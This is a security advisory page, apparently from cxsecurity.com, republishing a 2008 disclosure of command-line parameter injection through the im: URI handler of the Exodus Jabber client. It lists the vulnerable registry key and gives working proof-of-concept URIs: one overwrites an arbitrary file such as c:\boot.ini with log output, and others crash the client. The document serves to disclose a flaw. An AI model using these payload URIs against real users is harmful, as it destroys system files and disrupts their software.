Exodus v0.10 uri handler arbitrary parameter injection

2008.11.18
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-94


Ogólna skala CVSS: 10/10
Znaczenie: 10/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

-------------------------------------------------------------------------------- Exodus v0.10 uri handler arbitrary parameter injection by Nine:Situations:Group::strawdog tested against IE8b/xpsp3 may not work against non-English systems because of an installation bug -------------------------------------------------------------------------------- software site: http://code.google.com/p/exodus/ description: Exodus is a free software instant messaging client developed by Peter Millard and written in Borland Delphi that can connect to Jabber servers and exchange messages with other Jabber users. Currently, binaries are only available for Microsoft Windows. Exodus was designed as the official successor of the Winjab client, as Winjab was a personal project that was becoming too difficult to maintain[..] -------------------------------------------------------------------------------- reg key: HKEY_CLASSES_ROOT\im\shell\Open\command C:\Program Files\Exodus\Exodus.exe -u '%1' -------------------------------------------------------------------------------- it's possible to inject arbitrary command line parameters, ex. this shows the argument list: im:///'%20-? this overwrites an arbitrary file: im:///'%20-l%20c:\boot.ini%20-v now boot.ini looks like this: [2008-11-17 13.50.41.437] Trying to setup the Auto Away timer. [2008-11-17 13.50.41.453] Using Win32 API for Autoaway checks!! -------------------------------------------------------------------------------- todo: investigate this even: im:///'%20-c%20[A*300] this will cause an infinite loop trough multiple unhandled exceptions and this: im:///'%20-c%20file:///aaaa%20 crash exodus.exe -------------------------------------------------------------------------------- our site ---------------------------------------> http://retrogod.altervista.org original url: http://retrogod.altervista.org/exodus_uri.html

Referencje:

http://xforce.iss.net/xforce/xfdb/46663
http://www.vupen.com/english/advisories/2008/3191
http://www.securityfocus.com/bid/32330
http://www.securityfocus.com/archive/1/archive/1/498389/100/0/threaded
http://www.milw0rm.com/exploits/7167
http://www.milw0rm.com/exploits/7145
http://secunia.com/advisories/32729
http://retrogod.altervista.org/exodus_uri.html
http://osvdb.org/49888


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top